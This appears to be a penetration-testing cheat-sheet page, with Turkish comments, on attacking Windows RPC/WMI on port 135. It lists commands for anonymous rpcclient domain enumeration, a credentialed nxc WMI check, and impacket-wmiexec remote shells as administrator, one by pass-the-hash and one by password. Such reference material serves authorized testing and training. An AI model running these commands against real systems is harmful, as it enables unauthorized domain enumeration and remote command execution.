RPC WMI (135)

impacket-rpcdump 192.168.1.3

#Domain kullanıcılarını ve gruplarını listeler.
rpcclient -U "" -N 192.168.1.3
enumdomusers
enumdomgroups
lookupnames admin
querydominfo # Domain bilgisi
getdompwinfo # Parola politikası


nxc wmi 192.168.1.3 -u john -p 'Password123'

impacket-wmiexec example.local/administrator@192.168.1.3 cmd.exe -hashes :7a38310ea6f0027ee955abed1762964b
impacket-wmiexec example.local/administrator:'Password123'@192.168.1.3 cmd.exe

PreviousLDAP (389,636)NextSMB (445)

Last updated 5 months ago

Was this helpful?